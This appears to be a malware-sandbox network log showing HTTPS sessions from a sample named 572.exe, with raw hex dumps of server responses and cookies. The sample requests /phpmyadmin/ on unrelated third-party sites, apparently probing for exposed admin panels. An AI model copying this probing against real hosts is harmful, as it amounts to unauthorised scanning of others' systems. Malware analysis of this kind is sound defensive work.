                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:51 UTC1252INData Raw: 36 36 41 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 36 70 44 6c 35 4d 48 4c 4c 4b 34 5f 57 33 47 5f 37 72 76 32 76 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 66A<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="6pDl5MHLLK4_W3G_7rv2vQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:51 UTC397INData Raw: 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 2d 77 65 62 6b 69 74 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 73 69 7a 65 3a 31 30 30 25 20 31 30 30 25 7d 7d 23 6c 6f 67 6f 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 68 65 69 67 68 74 3a 35 34 70 78 3b 77 69 64 74 68 3a 31 35 30 70 78 7d 3c 2f 73 74 79 6c 65 3e 3c 6d 61 69 6e 20 69 64 3d 22 61 66 2d 65 72 72 6f 72 2d 63 6f 6e 74 61 69 6e 65 72 22 20 72 6f 6c 65 3d 22 6d 61 69 6e 22 3e 3c 61 20 68 72 65 66 3d 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 3e 3c 73 70 61 6e 20 69 64 3d 6c 6f 67 6f 20 61 72 69 61 2d 6c 61 62 65 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: ogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:150px}</style><main id="af-error-container" role="main"><a href=//www.google.com><span id=logo aria-label=Google role=img></spa
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:51 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                34192.168.2.654903172.66.40.88443524C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:51 UTC176OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: warriorplus.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:51 UTC1366INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:51 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                                                x-powered-by: PHP/7.0.33-6+ubuntu14.04.1+deb.sury.org+3
                                                                                                                                                                                                                                                                                                                                                                expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                                                                                                                                pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                set-cookie: warriorplus=c14l8412vca5e543ogr2qmo762; expires=Wed, 06-Mar-2024 11:14:51 GMT; Max-Age=2592000; path=/
                                                                                                                                                                                                                                                                                                                                                                set-cookie: rqtok=374744f34b056f2b4672; expires=Tue, 06-Feb-2024 11:14:51 GMT; Max-Age=86400; path=/
                                                                                                                                                                                                                                                                                                                                                                set-cookie: TOKEN=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                                                                                                                                                                                                                                                                                                set-cookie: TOKEN=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                                                                                                                                                                                                                                                                                                set-cookie: PASSWORD=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                                                                                                                                                                                                                                                                                                set-cookie: PASSWORD=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                                                                                                                                                                                                                                                                                                set-cookie: notifications=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                                                                                                                                                                                                                                                                                                set-cookie: notifications_aff=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                                                                                                                                                                                                                                                                                                set-cookie: notifications_sales=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                                                                                                                                                                                                                                                                                                set-cookie: wpg=gw1s33s7p59ds9s2; expires=Tue, 04-Feb-2025 11:14:51 GMT; Max-Age=31536000; path=/
                                                                                                                                                                                                                                                                                                                                                                set-cookie: wpg=gw1s33s7p59ds9s2; expires=Tue, 04-Feb-2025 11:14:51 GMT; Max-Age=31536000; path=/
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:51 UTC523INData Raw: 73 65 74 2d 63 6f 6f 6b 69 65 3a 20 6e 61 5f 6e 65 77 3d 31 3b 20 65 78 70 69 72 65 73 3d 54 75 65 2c 20 30 36 2d 46 65 62 2d 32 30 32 34 20 31 31 3a 31 34 3a 35 31 20 47 4d 54 3b 20 4d 61 78 2d 41 67 65 3d 38 36 34 30 30 3b 20 70 61 74 68 3d 2f 0d 0a 43 46 2d 43 61 63 68 65 2d 53 74 61 74 75 73 3a 20 44 59 4e 41 4d 49 43 0d 0a 52 65 70 6f 72 74 2d 54 6f 3a 20 7b 22 65 6e 64 70 6f 69 6e 74 73 22 3a 5b 7b 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 61 2e 6e 65 6c 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 5c 2f 72 65 70 6f 72 74 5c 2f 76 33 3f 73 3d 31 33 55 33 35 57 35 4a 36 77 42 53 39 49 66 33 58 62 30 63 76 4b 45 50 37 56 52 4c 74 52 79 50 36 51 58 45 43 51 78 42 78 79 32 4f 43 7a 67 69 6b 48 62 25 32 42 46 4b 77 72 78 53 4e 79 61 6f 56 41 43
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: set-cookie: na_new=1; expires=Tue, 06-Feb-2024 11:14:51 GMT; Max-Age=86400; path=/CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=13U35W5J6wBS9If3Xb0cvKEP7VRLtRyP6QXECQxBxy2OCzgikHb%2BFKwrxSNyaoVAC
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:51 UTC1369INData Raw: 37 66 66 32 0d 0a 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 57 61 72 72 69 6f 72 50 6c 75 73 20 7c 20 57 61 72 72 69 6f 72 50 6c 75 73 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 77 65 62 73 69 74 65 22 3e 0a 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 57 61 72 72 69 6f 72 50 6c 75 73 22 3e 0a 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 73 69 74 65 5f 6e 61 6d 65 22 20 63 6f 6e 74 65 6e 74 3d 22 57 61 72 72 69 6f 72 50 6c 75 73 20 3a 20 59 6f 75 72 20 50 72 6f 66 69 74 20 69 73 20 4f 75 72 20 42 75
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 7ff2<!DOCTYPE html><html lang="en"><head><title>WarriorPlus | WarriorPlus</title><meta property="og:type" content="website"><meta property="og:title" content="WarriorPlus"><meta property="og:site_name" content="WarriorPlus : Your Profit is Our Bu
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:51 UTC1369INData Raw: 3a 76 6f 69 64 20 30 2c 61 70 70 6c 69 63 61 74 69 6f 6e 49 44 3a 76 6f 69 64 20 30 2c 73 61 3a 76 6f 69 64 20 30 2c 71 75 65 75 65 54 69 6d 65 3a 76 6f 69 64 20 30 2c 61 70 70 6c 69 63 61 74 69 6f 6e 54 69 6d 65 3a 76 6f 69 64 20 30 2c 74 74 47 75 69 64 3a 76 6f 69 64 20 30 2c 75 73 65 72 3a 76 6f 69 64 20 30 2c 61 63 63 6f 75 6e 74 3a 76 6f 69 64 20 30 2c 70 72 6f 64 75 63 74 3a 76 6f 69 64 20 30 2c 65 78 74 72 61 3a 76 6f 69 64 20 30 2c 6a 73 41 74 74 72 69 62 75 74 65 73 3a 7b 7d 2c 75 73 65 72 41 74 74 72 69 62 75 74 65 73 3a 76 6f 69 64 20 30 2c 61 74 74 73 3a 76 6f 69 64 20 30 2c 74 72 61 6e 73 61 63 74 69 6f 6e 4e 61 6d 65 3a 76 6f 69 64 20 30 2c 74 4e 61 6d 65 50 6c 61 69 6e 3a 76 6f 69 64 20 30 7d 2c 61 3d 7b 7d 3b 66 75 6e 63 74 69 6f 6e 20 73
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: :void 0,applicationID:void 0,sa:void 0,queueTime:void 0,applicationTime:void 0,ttGuid:void 0,user:void 0,account:void 0,product:void 0,extra:void 0,jsAttributes:{},userAttributes:void 0,atts:void 0,transactionName:void 0,tNamePlain:void 0},a={};function s
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:51 UTC1369INData Raw: 30 2c 6f 62 66 75 73 63 61 74 65 3a 76 6f 69 64 20 30 2c 6a 73 65 72 72 6f 72 73 3a 7b 65 6e 61 62 6c 65 64 3a 21 30 2c 68 61 72 76 65 73 74 54 69 6d 65 53 65 63 6f 6e 64 73 3a 31 30 2c 61 75 74 6f 53 74 61 72 74 3a 21 30 7d 2c 6d 65 74 72 69 63 73 3a 7b 65 6e 61 62 6c 65 64 3a 21 30 2c 61 75 74 6f 53 74 61 72 74 3a 21 30 7d 2c 70 61 67 65 5f 61 63 74 69 6f 6e 3a 7b 65 6e 61 62 6c 65 64 3a 21 30 2c 68 61 72 76 65 73 74 54 69 6d 65 53 65 63 6f 6e 64 73 3a 33 30 2c 61 75 74 6f 53 74 61 72 74 3a 21 30 7d 2c 70 61 67 65 5f 76 69 65 77 5f 65 76 65 6e 74 3a 7b 65 6e 61 62 6c 65 64 3a 21 30 2c 61 75 74 6f 53 74 61 72 74 3a 21 30 7d 2c 70 61 67 65 5f 76 69 65 77 5f 74 69 6d 69 6e 67 3a 7b 65 6e 61 62 6c 65 64 3a 21 30 2c 68 61 72 76 65 73 74 54 69 6d 65 53 65 63
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 0,obfuscate:void 0,jserrors:{enabled:!0,harvestTimeSeconds:10,autoStart:!0},metrics:{enabled:!0,autoStart:!0},page_action:{enabled:!0,harvestTimeSeconds:30,autoStart:!0},page_view_event:{enabled:!0,autoStart:!0},page_view_timing:{enabled:!0,harvestTimeSec
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:51 UTC1369INData Raw: 21 30 2c 68 61 72 76 65 73 74 54 69 6d 65 53 65 63 6f 6e 64 73 3a 31 30 2c 61 75 74 6f 53 74 61 72 74 3a 21 30 7d 7d 7d 2c 70 3d 7b 7d 2c 67 3d 22 41 6c 6c 20 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 6f 62 6a 65 63 74 73 20 72 65 71 75 69 72 65 20 61 6e 20 61 67 65 6e 74 20 69 64 65 6e 74 69 66 69 65 72 21 22 3b 66 75 6e 63 74 69 6f 6e 20 6d 28 65 29 7b 69 66 28 21 65 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 67 29 3b 69 66 28 21 70 5b 65 5d 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 43 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 66 6f 72 20 22 2e 63 6f 6e 63 61 74 28 65 2c 22 20 77 61 73 20 6e 65 76 65 72 20 73 65 74 22 29 29 3b 72 65 74 75 72 6e 20 70 5b 65 5d 7d 66 75 6e 63 74 69 6f 6e 20 76 28 65 2c 74 29 7b 69 66 28 21 65 29 74 68 72
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: !0,harvestTimeSeconds:10,autoStart:!0}}},p={},g="All configuration objects require an agent identifier!";function m(e){if(!e)throw new Error(g);if(!p[e])throw new Error("Configuration for ".concat(e," was never set"));return p[e]}function v(e,t){if(!e)thr
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:51 UTC1369INData Raw: 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 2c 76 65 72 73 69 6f 6e 3a 53 2e 71 34 2c 64 65 6e 79 4c 69 73 74 3a 76 6f 69 64 20 30 7d 2c 52 3d 7b 7d 3b 66 75 6e 63 74 69 6f 6e 20 44 28 65 29 7b 69 66 28 21 65 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 41 6c 6c 20 72 75 6e 74 69 6d 65 20 6f 62 6a 65 63 74 73 20 72 65 71 75 69 72 65 20 61 6e 20 61 67 65 6e 74 20 69 64 65 6e 74 69 66 69 65 72 21 22 29 3b 69 66 28 21 52 5b 65 5d 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 52 75 6e 74 69 6d 65 20 66 6f 72 20 22 2e 63 6f 6e 63 61 74 28 65 2c 22 20 77 61 73 20 6e 65 76 65 72 20 73 65 74 22 29 29 3b 72 65 74 75 72 6e 20 52 5b 65 5d 7d 66 75 6e 63 74 69 6f 6e 20 4f 28 65 2c 74 29 7b 69 66 28 21 65 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: ddEventListener,version:S.q4,denyList:void 0},R={};function D(e){if(!e)throw new Error("All runtime objects require an agent identifier!");if(!R[e])throw new Error("Runtime for ".concat(e," was never set"));return R[e]}function O(e,t){if(!e)throw new Erro
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:51 UTC1369INData Raw: 30 2e 30 2d 61 6c 70 68 61 2e 31 31 22 7d 2c 33 38 35 3a 28 65 2c 74 2c 72 29 3d 3e 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 72 2e 64 28 74 2c 7b 46 4e 3a 28 29 3d 3e 73 2c 49 46 3a 28 29 3d 3e 75 2c 4e 6b 3a 28 29 3d 3e 66 2c 54 74 3a 28 29 3d 3e 63 2c 5f 41 3a 28 29 3d 3e 6f 2c 63 76 3a 28 29 3d 3e 68 2c 69 53 3a 28 29 3d 3e 61 2c 69 6c 3a 28 29 3d 3e 6e 2c 75 78 3a 28 29 3d 3e 64 2c 76 36 3a 28 29 3d 3e 69 2c 77 31 3a 28 29 3d 3e 6c 7d 29 3b 63 6f 6e 73 74 20 6e 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 26 26 21 21 77 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 2c 69 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 57 6f 72 6b 65 72 47 6c 6f 62 61 6c 53 63 6f 70 65 26 26 28 22 75 6e 64 65 66 69 6e 65
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 0.0-alpha.11"},385:(e,t,r)=>{"use strict";r.d(t,{FN:()=>s,IF:()=>u,Nk:()=>f,Tt:()=>c,_A:()=>o,cv:()=>h,iS:()=>a,il:()=>n,ux:()=>d,v6:()=>i,w1:()=>l});const n="undefined"!=typeof window&&!!window.document,i="undefined"!=typeof WorkerGlobalScope&&("undefine
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:51 UTC1369INData Raw: 64 43 6f 6e 74 65 78 74 2c 69 29 2c 4f 62 6a 65 63 74 2e 65 6e 74 72 69 65 73 28 65 29 2e 66 6f 72 45 61 63 68 28 28 65 3d 3e 7b 6c 65 74 5b 74 2c 72 5d 3d 65 3b 4f 62 6a 65 63 74 2e 6b 65 79 73 28 69 29 2e 69 6e 63 6c 75 64 65 73 28 74 29 26 26 28 74 68 69 73 2e 73 68 61 72 65 64 43 6f 6e 74 65 78 74 5b 74 5d 3d 72 29 7d 29 29 7d 63 61 74 63 68 28 65 29 7b 28 30 2c 6e 2e 5a 29 28 22 41 6e 20 65 72 72 6f 72 20 6f 63 63 75 72 65 64 20 77 68 69 6c 65 20 73 65 74 74 69 6e 67 20 53 68 61 72 65 64 43 6f 6e 74 65 78 74 22 2c 65 29 7d 7d 7d 7d 2c 38 65 33 3a 28 65 2c 74 2c 72 29 3d 3e 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 72 2e 64 28 74 2c 7b 4c 3a 28 29 3d 3e 75 2c 52 3a 28 29 3d 3e 63 7d 29 3b 76 61 72 20 6e 3d 72 28 38 33 32 35 29 2c 69 3d 72 28 31 32 38
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: dContext,i),Object.entries(e).forEach((e=>{let[t,r]=e;Object.keys(i).includes(t)&&(this.sharedContext[t]=r)}))}catch(e){(0,n.Z)("An error occured while setting SharedContext",e)}}}},8e3:(e,t,r)=>{"use strict";r.d(t,{L:()=>u,R:()=>c});var n=r(8325),i=r(128
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:51 UTC1369INData Raw: 7d 2c 73 3d 7b 7d 2c 75 3d 7b 7d 2c 66 3d 21 31 3b 74 72 79 7b 66 3d 31 36 3d 3d 3d 72 2e 6c 65 6e 67 74 68 26 26 28 30 2c 6f 2e 4f 50 29 28 72 29 2e 69 73 6f 6c 61 74 65 64 42 61 63 6b 6c 6f 67 7d 63 61 74 63 68 28 65 29 7b 7d 76 61 72 20 68 3d 7b 6f 6e 3a 67 2c 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 3a 67 2c 72 65 6d 6f 76 65 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 72 3d 6e 5b 65 5d 3b 69 66 28 21 72 29 72 65 74 75 72 6e 3b 66 6f 72 28 76 61 72 20 69 3d 30 3b 69 3c 72 2e 6c 65 6e 67 74 68 3b 69 2b 2b 29 72 5b 69 5d 3d 3d 3d 74 26 26 72 2e 73 70 6c 69 63 65 28 69 2c 31 29 7d 2c 65 6d 69 74 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 72 2c 6e 2c 69 2c 6f 29 7b 21 31 21 3d 3d 6f 26 26 28 6f 3d 21 30
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: },s={},u={},f=!1;try{f=16===r.length&&(0,o.OP)(r).isolatedBacklog}catch(e){}var h={on:g,addEventListener:g,removeEventListener:function(e,t){var r=n[e];if(!r)return;for(var i=0;i<r.length;i++)r[i]===t&&r.splice(i,1)},emit:function(e,r,n,i,o){!1!==o&&(o=!0
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:51 UTC1369INData Raw: 3b 76 61 72 20 61 3d 74 5b 6f 5d 3d 74 5b 6f 5d 7c 7c 7b 7d 3b 28 61 5b 72 5d 3d 61 5b 72 5d 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 65 2c 69 5d 29 7d 7d 2c 33 32 33 39 3a 28 65 2c 74 2c 72 29 3d 3e 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 72 2e 64 28 74 2c 7b 62 50 3a 28 29 3d 3e 73 2c 69 7a 3a 28 29 3d 3e 63 2c 6d 24 3a 28 29 3d 3e 61 7d 29 3b 76 61 72 20 6e 3d 72 28 33 38 35 29 3b 6c 65 74 20 69 3d 21 31 2c 6f 3d 21 31 3b 74 72 79 7b 63 6f 6e 73 74 20 65 3d 7b 67 65 74 20 70 61 73 73 69 76 65 28 29 7b 72 65 74 75 72 6e 20 69 3d 21 30 2c 21 31 7d 2c 67 65 74 20 73 69 67 6e 61 6c 28 29 7b 72 65 74 75 72 6e 20 6f 3d 21 30 2c 21 31 7d 7d 3b 6e 2e 5f 41 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 74 65 73 74 22 2c 6e 75 6c 6c 2c 65 29 2c 6e 2e 5f
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: ;var a=t[o]=t[o]||{};(a[r]=a[r]||[]).push([e,i])}},3239:(e,t,r)=>{"use strict";r.d(t,{bP:()=>s,iz:()=>c,m$:()=>a});var n=r(385);let i=!1,o=!1;try{const e={get passive(){return i=!0,!1},get signal(){return o=!0,!1}};n._A.addEventListener("test",null,e),n._


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                35192.168.2.65485977.240.114.212443524C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:51 UTC173OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: mw.redsa.net
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:51 UTC335INHTTP/1.1 404 No Encontrado
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:06 GMT
                                                                                                                                                                                                                                                                                                                                                                Server: Apache-Coyote/1.1
                                                                                                                                                                                                                                                                                                                                                                Strict-Transport-Security: max-age=63072000; includeSubDomains; preload
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html;charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                Content-Language: es
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 1060
                                                                                                                                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:51 UTC1060INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 41 70 61 63 68 65 20 54 6f 6d 63 61 74 2f 38 2e 30 2e 31 34 20 28 44 65 62 69 61 6e 29 20 2d 20 49 6e 66 6f 72 6d 65 20 64 65 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 48 31 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 32 32 70 78 3b 7d 20 48 32 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE html><html><head><title>Apache Tomcat/8.0.14 (Debian) - Informe de Error</title><style type="text/css">H1 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:22px;} H2 {font-family:Tahoma,Arial,sans-serif;color:wh


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                36192.168.2.655007184.25.164.103443524C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:51 UTC172OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: store.steampowered.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:51 UTC1812INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://store.cloudflare.steamstatic.com/ https://store.cloudflare.steamstatic.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' http://store.steampowered.com https://store.steampowered.com http://127.0.0.1:27060 ws://127.0.0.1:27060 https://community.cloudflare.steamstatic.com/ https://steamcommunity.com/ https://steamcommunity.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://shared.cloudflare.steamstatic.com/ https://checkout.steampowered.com/; frame-src 'self' steam: http://www.youtube.com https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://steamcommunity.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'none';
                                                                                                                                                                                                                                                                                                                                                                X-Frame-Options: DENY
                                                                                                                                                                                                                                                                                                                                                                Strict-Transport-Security: max-age=10368000
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:51 GMT
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                                                Connection: Transfer-Encoding
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: steamCountry=US%7C30188d811e243eaaab468117a5a3e458; Path=/; Secure; HttpOnly; SameSite=None
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: browserid=3292762664476449515; Expires=Tue, 04 Feb 2025 11:14:51 GMT; Path=/; Secure; SameSite=None
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: sessionid=47ff0c288429b91038db8b2f; Path=/; Secure; SameSite=None
